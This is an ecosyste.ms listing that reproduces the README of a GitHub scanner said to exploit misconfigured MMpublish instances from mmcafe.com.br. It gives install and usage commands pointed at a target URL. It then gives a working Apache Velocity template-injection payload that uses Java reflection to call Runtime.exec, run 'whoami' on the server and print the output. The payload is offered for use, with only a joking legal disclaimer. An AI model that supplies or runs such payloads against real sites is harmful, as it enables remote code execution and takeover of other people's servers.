Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/incogbyte/mmpublish-scanner

Exploit miss configured mmpublish instances from "mmcafe.com.br"
https://github.com/incogbyte/mmpublish-scanner

Last synced: 18 days ago
JSON representation

Exploit miss configured mmpublish instances from "mmcafe.com.br"

Awesome Lists containing this project

README

        

# Description
This tool exploits misconfigured instances of MMpublish a tool made by mmcafe.com.br
Use this tool for legal propose only :P.

# Requirements

```
python3 >= python3.8
```

# Install

```
pip3 install requirements.txt
```

# Usage

```
python3 main.py -u https://target.com.br
```

![img02.png](img02.png)

# If you got access to admin panel use the Velocity payload

```
#set($x='')##
#set($rt = $x.class.forName('java.lang.Runtime'))##
#set($chr = $x.class.forName('java.lang.Character'))##
#set($str = $x.class.forName('java.lang.String'))##

#set($ex=$rt.getRuntime().exec('whoami'))##
$ex.waitFor()
#set($out=$ex.getInputStream())##
#foreach( $i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
```